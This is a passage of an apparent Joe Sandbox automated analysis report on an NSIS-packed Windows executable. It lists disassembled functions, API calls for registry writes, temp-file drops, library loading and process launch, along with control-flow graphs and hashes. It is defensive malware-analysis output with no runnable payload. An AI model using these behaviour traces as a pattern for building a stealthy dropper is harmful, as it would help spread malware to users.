                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\3507071243740008011.exe",00403371,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF), ref: 00405DDC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-3909342656
                                                  • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                  • Instruction ID: 0c0ec814c80ab85915f41b1413265c2d813ce01cabb3ac5407dd3af97de42ecd
                                                  • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                  • Instruction Fuzzy Hash: 99F03076600304FFEB009F69DD09E9BB7A9EF95710F11803BE900E7250E6B199549B64
                                                  Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 828 10001759-10001795 call 10001b18 832 100018a6-100018a8 828->832 833 1000179b-1000179f 828->833 834 100017a1-100017a7 call 10002286 833->834 835 100017a8-100017b5 call 100022d0 833->835 834->835 840 100017e5-100017ec 835->840 841 100017b7-100017bc 835->841 842 1000180c-10001810 840->842 843 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 840->843 844 100017d7-100017da 841->844 845 100017be-100017bf 841->845 849 10001812-1000184c call 100015b4 call 100024a4 842->849 850 1000184e-10001854 call 100024a4 842->850 865 10001855-10001859 843->865 844->840 851 100017dc-100017dd call 10002b57 844->851 847 100017c1-100017c2 845->847 848 100017c7-100017c8 call 1000289c 845->848 853 100017c4-100017c5 847->853 854 100017cf-100017d5 call 10002640 847->854 861 100017cd 848->861 849->865 850->865 864 100017e2 851->864 853->840 853->848 869 100017e4 854->869 861->864 864->869 870 10001896-1000189d 865->870 871 1000185b-10001869 call 10002467 865->871 869->840 870->832 876 1000189f-100018a0 GlobalFree 870->876 878 10001881-10001888 871->878 879 1000186b-1000186e 871->879 876->832 878->870 881 1000188a-10001895 call 1000153d 878->881 879->878 880 10001870-10001878 879->880 880->878 882 1000187a-1000187b FreeLibrary 880->882 881->870 882->878
                                                  APIs
                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                    • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                  • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                  • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                  • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                    • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                    • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                    • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc$Librarylstrcpy
                                                  • String ID:
                                                  • API String ID: 1791698881-3916222277
                                                  • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                  • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                  • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                  • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                  Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 885 4023de-40240f call 402c37 * 2 call 402cc7 892 402415-40241f 885->892 893 402abf-402ace 885->893 895 402421-40242e call 402c37 lstrlenW 892->895 896 402432-402435 892->896 895->896 897 402437-402448 call 402c15 896->897 898 402449-40244c 896->898 897->898 902 40245d-402471 RegSetValueExW 898->902 903 40244e-402458 call 4030fa 898->903 907 402473 902->907 908 402476-402557 RegCloseKey 902->908 903->902 907->908 908->893 910 402885-40288c 908->910 910->893
                                                  APIs
                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsy62D9.tmp,00000023,00000011,00000002), ref: 00402429
                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsy62D9.tmp,00000000,00000011,00000002), ref: 00402469
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsy62D9.tmp,00000000,00000011,00000002), ref: 00402551
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CloseValuelstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsy62D9.tmp
                                                  • API String ID: 2655323295-1089519228
                                                  • Opcode ID: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                  • Instruction ID: 6bb9d856f7880fc58a9027dca602f60b1bf716c37025aa19f03bdcb786be9778
                                                  • Opcode Fuzzy Hash: b9a55d7f8e3e2dfd25d95f10a550debddd0b738e27ba6f811f629087d2df6e98
                                                  • Instruction Fuzzy Hash: 33118171E00108AEEB10AFA5DE49EAEBAB8EB54354F11843AF504F71D1DBB84D419B58
                                                  Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Close$Enum
                                                  • String ID:
                                                  • API String ID: 464197530-0
                                                  • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                  • Instruction ID: 79d7ed05643b621c8e133add132d673d265f3a1e436d48668917152172a1be90
                                                  • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                  • Instruction Fuzzy Hash: AD116A32540509FBDF129F90CE09BEE7B69EF58340F110036B905B50E0E7B5DE21AB68
                                                  Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00405BFE: CharNextW.USER32(?,?,0042FA50,?,00405C72,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C0C
                                                    • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                    • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                    • Part of subcall function 004057B5: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular,?,00000000,000000F0), ref: 0040164D
                                                  Strings
                                                  • C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular, xrefs: 00401640
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID: C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular
                                                  • API String ID: 1892508949-3139891972
                                                  • Opcode ID: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                  • Instruction ID: f4fc84295b44ed4b17ac4e1ae603b231d2bd930c419d474b78473434f223dd35
                                                  • Opcode Fuzzy Hash: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                  • Instruction Fuzzy Hash: 7711BE31504104ABCF316FA4CD01AAF36A0EF14368B28493BEA45B22F1DB3E4E519A4E
                                                  Function 0040525A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00405289
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004052DA
                                                    • Part of subcall function 00404263: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404275
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                  • Instruction ID: e35359e86d41fb5d6968ee62a371e6abd11f03428b82ac61abb391d392e116c6
                                                  • Opcode Fuzzy Hash: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                  • Instruction Fuzzy Hash: 0E017131510609ABDF209F51DD84A5B3A25EF84754F5000BBFA04751D1C77A9C929E6E
                                                  Function 00406150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063C4,80000002), ref: 00406196
                                                  • RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID: Call
                                                  • API String ID: 3356406503-1824292864
                                                  • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                  • Instruction ID: ccae29ee16f81b62eed190a0e72f85d1395cd89474178e8bc9e2f9375c5b4726
                                                  • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                  • Instruction Fuzzy Hash: C7017172510209EADF21CF55CD05EDF3BA8EB54360F018035FD1596191D779D968CBA4
                                                  Function 00405867 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                  • CloseHandle.KERNEL32(?), ref: 0040589D
                                                  Strings
                                                  • Error launching installer, xrefs: 0040587A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateHandleProcess
                                                  • String ID: Error launching installer
                                                  • API String ID: 3712363035-66219284
                                                  • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                  • Instruction ID: d54ab7d3c02f92ec190dfac26e1bcd6e14271da7ed0e34d6283108f8b7c5a0e7
                                                  • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                  • Instruction Fuzzy Hash: D4E09AB5900209BFEB109F65DD49F7B77ACEB04744F004565BD50F2150D778D8148A78
                                                  Function 0040202C Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402057
                                                    • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                    • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                    • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                    • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                    • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                    • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                    • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                  • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 334405425-0
                                                  • Opcode ID: 864119935e3c92a972c97e6683a8f1d17c59749ba81c3d86f0a55431c134cf0a
                                                  • Instruction ID: 42f79ed1eba5b951ee52ea84f7896f3e8cd2b7b6c2435203e6ffc1da5cb37fd9
                                                  • Opcode Fuzzy Hash: 864119935e3c92a972c97e6683a8f1d17c59749ba81c3d86f0a55431c134cf0a
                                                  • Instruction Fuzzy Hash: EF21C271900208EACF20AFA5CE4DAAE7A70AF04358F64413BF611B51E0DBBD8941DA5E
                                                  Function 1000289C Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000), ref: 1000295B
                                                  • GetLastError.KERNEL32 ref: 10002A62
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastPointer
                                                  • String ID:
                                                  • API String ID: 2976181284-0
                                                  • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                  • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                  • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                  • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                  Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024AF
                                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsy62D9.tmp,00000000,00000011,00000002), ref: 00402551
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue
                                                  • String ID:
                                                  • API String ID: 3356406503-0
                                                  • Opcode ID: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                  • Instruction ID: 5dbb434a41a715d7517c89e318d331cd35bfdf9d93bbd69694c25902619df99f
                                                  • Opcode Fuzzy Hash: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                  • Instruction Fuzzy Hash: DC11A331910209EFEF24DFA4CA585BEB6B4EF04354F21843FE046A72C0D7B84A45DB59
                                                  Function 00405C5B Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                    • Part of subcall function 00405BFE: CharNextW.USER32(?,?,0042FA50,?,00405C72,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C0C
                                                    • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                    • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                  • lstrlenW.KERNEL32(0042FA50,00000000,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405CB4
                                                  • GetFileAttributesW.KERNELBASE(0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00405CC4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                  • String ID:
                                                  • API String ID: 3248276644-0
                                                  • Opcode ID: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                  • Instruction ID: 85ea7651a51856ee7c4c0712bbf35357d52fdd33bb29f336d43f3a771a20a055
                                                  • Opcode Fuzzy Hash: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                  • Instruction Fuzzy Hash: 0DF0F925109F5215F622323A1D09EAF2554CF83368716463FF952B16D5DA3C99038D7D
